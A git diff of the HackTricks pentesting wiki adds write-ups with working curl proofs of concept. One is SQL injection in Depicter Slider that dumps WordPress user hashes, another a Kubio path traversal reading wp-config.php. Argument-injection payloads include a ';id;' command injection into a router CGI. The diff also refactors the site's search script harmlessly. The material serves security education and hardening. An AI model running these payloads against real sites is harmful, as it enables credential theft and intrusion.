+- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code
+- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows
+
+---
+
+## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1)
+
+Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization.
+
+- Parameter: s (search)
+- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization
+- Impact: database exfiltration (users, hashes), lateral movement
+
+PoC
+
+```bash
+# Replace action with the affected depicter-* handler on the target
+curl -G "https://victim.tld/wp-admin/admin-ajax.php" \
+  --data-urlencode 'action=depicter_search' \
+  --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -"
+```
+
+Detection checklist
+- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL
+- Review custom queries passed to $wpdb->get_results()/query() concatenating s
+
+Hardening
+- Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side
+- Add a strict allowlist for s and normalize to expected charset/length
+
+---
+
+## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1)
+
+Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime.
+
+- Parameter: __kubio-site-edit-iframe-classic-template
+- Flaw: no normalization/allowlisting; traversal permitted
+- Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP)
+
+PoC – read wp-config.php
+
+```bash
+curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php"
+```
+
+Detection checklist
+- Any handler concatenating request paths into include()/require()/read sinks without realpath() containment
+- Look for traversal patterns (../) reaching outside the intended templates directory
+
+Hardening
+- Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base))
+- Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths)
+
+
 ## References
 
 - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
@@ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0)
 - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
 - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
 - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
-
 - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/)
+- [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/)
+- [OttoKit (SureTriggers) ≤ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability)
+- [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability)
+- [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability)
+- [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/command-injection.md

@@ -158,6 +158,37 @@ execFile('/usr/bin/do-something', [
 
 Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
 
+### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
+
+Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
+
+Typical places where this appears:
+
+- Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
+- Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator.
+
+What to try:
+
+- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool.
+- Abuse flags that change behavior or write files, for example:
+  - `ping`: `-f`/`-c 100000` to stress the device (DoS)
+  - `curl`: `-o /tmp/x` to write arbitrary paths, `-K <url>` to load attacker-controlled config
+  - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers
+- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place.
+
+Generic PoC shapes against centralized CGI dispatchers:
+
+```
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# Flip options in a downstream tool via argv injection
+topicurl=<handler>&param=-n
+
+# Unauthenticated RCE when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+```
+
 ## Brute-Force Detection List
 
 
@@ -173,5 +204,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
 {{#include ../banners/hacktricks-training.md}}

src/welcome/hacktricks-values-and-faq.md

@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
 
 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
+> - **How can I reference a page of HackTricks?**
 
 As long as the link **of** the page(s) where you took the information from appears it's enough.\
 If you need a bibtex you can use something like:
@@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
 
 {{#include ../banners/hacktricks-training.md}}
 
-

theme/ht_searcher.js

@@ -6,34 +6,63 @@
 */
 
 (() => {
-  "use strict";
+    "use strict";
+  
+    /* ───────────── 0. helpers (main thread) ───────────── */
+    const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
+  
+    /* ───────────── 1. Web‑Worker code ─────────────────── */
+    const workerCode = `
+      self.window = self;
+      self.search = self.search || {};
+      const abs = p => location.origin + p;
+  
+      /* 1 — elasticlunr */
+      try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
+      catch { importScripts(abs('/elasticlunr.min.js')); }
+  
+    /* 2 — decompress gzip data */
+    async function decompressGzip(arrayBuffer){
+      if(typeof DecompressionStream !== 'undefined'){
+        /* Modern browsers: use native DecompressionStream */
+        const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip'));
+        const decompressed = await new Response(stream).arrayBuffer();
+        return new TextDecoder().decode(decompressed);
+      } else {
+        /* Fallback: use pako library */
+        if(typeof pako === 'undefined'){
+          try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); }
+          catch(e){ throw new Error('pako library required for decompression: '+e); }
+        }
+        const uint8Array = new Uint8Array(arrayBuffer);
+        const decompressed = pako.ungzip(uint8Array, {to: 'string'});
+        return decompressed;
+      }
+    }
 
-  /* ───────────── 0. helpers (main thread) ───────────── */
+    /* 3 — load a single index (remote → local) */
-  const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
-
-  /* ───────────── 1. Web‑Worker code ─────────────────── */
-  const workerCode = `
-    self.window = self;
-    self.search = self.search || {};
-    const abs = p => location.origin + p;
-
-    /* 1 — elasticlunr */
-    try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
-    catch { importScripts(abs('/elasticlunr.min.js')); }
-
-    /* 2 — load a single index (remote → local) */
     async function loadIndex(remote, local, isCloud=false){
       let rawLoaded = false;
       if(remote){
+        /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */
         try {
           const r = await fetch(remote,{mode:'cors'});
-          if (!r.ok) throw new Error('HTTP '+r.status);
+          if (r.ok) {
-          importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
+            const compressed = await r.arrayBuffer();
-          rawLoaded = true;
+            const text = await decompressGzip(compressed);
-        } catch(e){ console.warn('remote',remote,'failed →',e); }
+            importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'})));
+            rawLoaded = true;
+            console.log('Loaded compressed from GitHub:',remote);
+          }
+        } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); }
       }
+      /* If remote (GitHub) failed, fall back to local uncompressed file */
       if(!rawLoaded && local){
-        try { importScripts(abs(local)); rawLoaded = true; }
+        try { 
+          importScripts(abs(local)); 
+          rawLoaded = true;
+          console.log('Loaded local fallback:',local);
+        }
         catch(e){ console.error('local',local,'failed →',e); }
       }
       if(!rawLoaded) return null;                 /* give up on this index */
@@ -61,151 +90,159 @@
 
       return local ? loadIndex(null, local, isCloud) : null;
     }
+    
+    let built = [];
+    const MAX = 30, opts = {bool:'AND', expand:true};
+    
+    self.onmessage = async ({data}) => {
+      if(data.type === 'init'){
+        const lang = data.lang || 'en';
+        const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master';
 
-    (async () => {
+        /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */
-      const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
+        const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz']));
-      const lang = htmlLang.split('-')[0];
+        const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz']));
-      const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download';
-      const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download';
 
-      const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
+        const MAIN_REMOTE_SOURCES  = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
-      const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
+        const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
 
-      const MAIN_REMOTE_SOURCES  = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
+        const indices = [];
-      const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
+        const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js',        false); if(main)  indices.push(main);
-
+        const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js',  true ); if(cloud) indices.push(cloud);  
-      const indices = [];
+        if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
-      const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js',        false); if(main)  indices.push(main);
+  
-      const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js',  true ); if(cloud) indices.push(cloud);
+        /* build index objects */
-
+        built = indices.map(d => ({
-      if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
+          idx : elasticlunr.Index.load(d.json),
-
+          urls: d.urls,
-      /* build index objects */
+          cloud: d.cloud,
-      const built = indices.map(d => ({
+          base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
-        idx : elasticlunr.Index.load(d.json),
+        }));
-        urls: d.urls,
+  
-        cloud: d.cloud,
+        postMessage({ready:true});
-        base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
+        return;
-      }));
+      }
-
+      
-      postMessage({ready:true});
+      const q = data.query || data;
-      const MAX = 30, opts = {bool:'AND', expand:true};
+      if(!q){ postMessage([]); return; }
-
+  
-      self.onmessage = ({data:q}) => {
+          const all = [];
-        if(!q){ postMessage([]); return; }
+          for(const s of built){
-
+            const res = s.idx.search(q,opts);
-        const all = [];
+            if(!res.length) continue;
-        for(const s of built){
+            const max = res[0].score || 1;
-          const res = s.idx.search(q,opts);
+            res.forEach(r => {
-          if(!res.length) continue;
+              const doc = s.idx.documentStore.getDoc(r.ref);
-          const max = res[0].score || 1;
+              all.push({
-          res.forEach(r => {
+                norm : r.score / max,
-            const doc = s.idx.documentStore.getDoc(r.ref);
+                title: doc.title,
-            all.push({
+                body : doc.body,
-              norm : r.score / max,
+                breadcrumbs: doc.breadcrumbs,
-              title: doc.title,
+                url  : s.base + s.urls[r.ref],
-              body : doc.body,
+                cloud: s.cloud
-              breadcrumbs: doc.breadcrumbs,
+              });
-              url  : s.base + s.urls[r.ref],
-              cloud: s.cloud
             });
-          });
+          }
-        }
+          all.sort((a,b)=>b.norm-a.norm);
-        all.sort((a,b)=>b.norm-a.norm);
+          postMessage(all.slice(0,MAX));
-        postMessage(all.slice(0,MAX));
+    };
-      };
+    `;
-    })();
+  
-  `;
+    /* ───────────── 2. spawn worker ───────────── */
+    const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
+    
+    /* ───────────── 2.1. initialize worker with language ───────────── */
+    const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
+    const lang = htmlLang.split('-')[0];
+    worker.postMessage({type: 'init', lang: lang});
+  
+    /* ───────────── 3. DOM refs ─────────────── */
+    const wrap    = document.getElementById('search-wrapper');
+    const bar     = document.getElementById('searchbar');
+    const list    = document.getElementById('searchresults');
+    const listOut = document.getElementById('searchresults-outer');
+    const header  = document.getElementById('searchresults-header');
+    const icon    = document.getElementById('search-toggle');
+  
+    const READY_ICON = icon.innerHTML;
+    icon.textContent = '⏳';
+    icon.setAttribute('aria-label','Loading search …');
+      icon.setAttribute('title','Search is loading, please wait...');
 
-  /* ───────────── 2. spawn worker ───────────── */
+  
-  const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
+    const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
-
+    let debounce, teaserCount=0;
-  /* ───────────── 3. DOM refs ─────────────── */
+  
-  const wrap    = document.getElementById('search-wrapper');
+    /* ───────────── helpers (teaser, metric) ───────────── */
-  const bar     = document.getElementById('searchbar');
+    const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&#34;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
-  const list    = document.getElementById('searchresults');
+    const URL_MARK='highlight';
-  const listOut = document.getElementById('searchresults-outer');
+    function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
-  const header  = document.getElementById('searchresults-header');
+  
-  const icon    = document.getElementById('search-toggle');
+    function makeTeaser(body,terms){
-
+      const stem=w=>elasticlunr.stemmer(w.toLowerCase());
-  const READY_ICON = icon.innerHTML;
+      const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
-  icon.textContent = '⏳';
+      const W=[],sents=body.toLowerCase().split('. ');
-  icon.setAttribute('aria-label','Loading search …');
+      let i=0,v=W_F,found=false;
-  icon.setAttribute('title','Search is loading, please wait...');
+      sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
-
+      if(!W.length) return body;
-  const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
+      const win=Math.min(W.length,WIN);
-  let debounce, teaserCount=0;
+      const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
-
+      for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
-  /* ───────────── helpers (teaser, metric) ───────────── */
+      const best=found?sums.lastIndexOf(Math.max(...sums)):0;
-  const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&#34;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
+      const out=[]; i=W[best][2];
-  const URL_MARK='highlight';
+      for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;}
-  function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
+      return out.join('');
-
-  function makeTeaser(body,terms){
-    const stem=w=>elasticlunr.stemmer(w.toLowerCase());
-    const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
-    const W=[],sents=body.toLowerCase().split('. ');
-    let i=0,v=W_F,found=false;
-    sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
-    if(!W.length) return body;
-    const win=Math.min(W.length,WIN);
-    const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
-    for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
-    const best=found?sums.lastIndexOf(Math.max(...sums)):0;
-    const out=[]; i=W[best][2];
-    for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;}
-    return out.join('');
-  }
-
-  function format(d,terms){
-    const teaser=makeTeaser(escapeHTML(d.body),terms);
-    teaserCount++;
-    const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
-    const parts=d.url.split('#'); if(parts.length===1) parts.push('');
-    const abs=d.url.startsWith('http');
-    const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
-    const style=d.cloud?" style=\"color:#1e88e5\"":"";
-    const isCloud=d.cloud?" [Cloud]":" [Book]";
-    return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+
-           `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`;
-  }
-
-  /* ───────────── UI control ───────────── */
-  function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
-  function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
-
-  icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
-
-  document.addEventListener('keydown',e=>{
-    if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
-    const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
-    if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
-    else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
-    else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
-  });
-
-  bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
-
-  /* ───────────── worker messages ───────────── */
-  worker.onmessage = ({data}) => {
-    if(data && data.ready!==undefined){
-      if(data.ready){ 
-        icon.innerHTML=READY_ICON; 
-        icon.setAttribute('aria-label','Open search (S)'); 
-        icon.removeAttribute('title');
-      }
-      else { 
-        icon.textContent='❌'; 
-        icon.setAttribute('aria-label','Search unavailable'); 
-        icon.setAttribute('title','Search is unavailable');
-      }
-      return;
     }
-    const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
+  
-    header.textContent=metric(docs.length,q);
+    function format(d,terms){
-    clear(list);
+      const teaser=makeTeaser(escapeHTML(d.body),terms);
-    docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
+      teaserCount++;
-    listOut.classList.toggle('hidden',!docs.length);
+      const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
-  };
+      const parts=d.url.split('#'); if(parts.length===1) parts.push('');
-})();
+      const abs=d.url.startsWith('http');
-
+      const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
+      const style=d.cloud?" style=\"color:#1e88e5\"":"";
+      const isCloud=d.cloud?" [Cloud]":" [Book]";
+      return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+
+             `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`;
+    }
+  
+    /* ───────────── UI control ───────────── */
+    function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
+    function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
+  
+    icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
+  
+    document.addEventListener('keydown',e=>{
+      if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
+      const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
+      if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
+      else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
+      else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
+    });
+  
+    bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); });
+  
+    /* ───────────── worker messages ───────────── */
+    worker.onmessage = ({data}) => {
+      if(data && data.ready!==undefined){
+        if(data.ready){ 
+          icon.innerHTML=READY_ICON; 
+          icon.setAttribute('aria-label','Open search (S)'); 
+          icon.removeAttribute('title');
+        }
+        else { 
+          icon.textContent='❌'; 
+          icon.setAttribute('aria-label','Search unavailable'); 
+          icon.setAttribute('title','Search is unavailable');
+        }
+        return;
+      }
+      const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
+      header.textContent=metric(docs.length,q);
+      clear(list);
+      docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
+      listOut.classList.toggle('hidden',!docs.length);
+    };
+  })();
+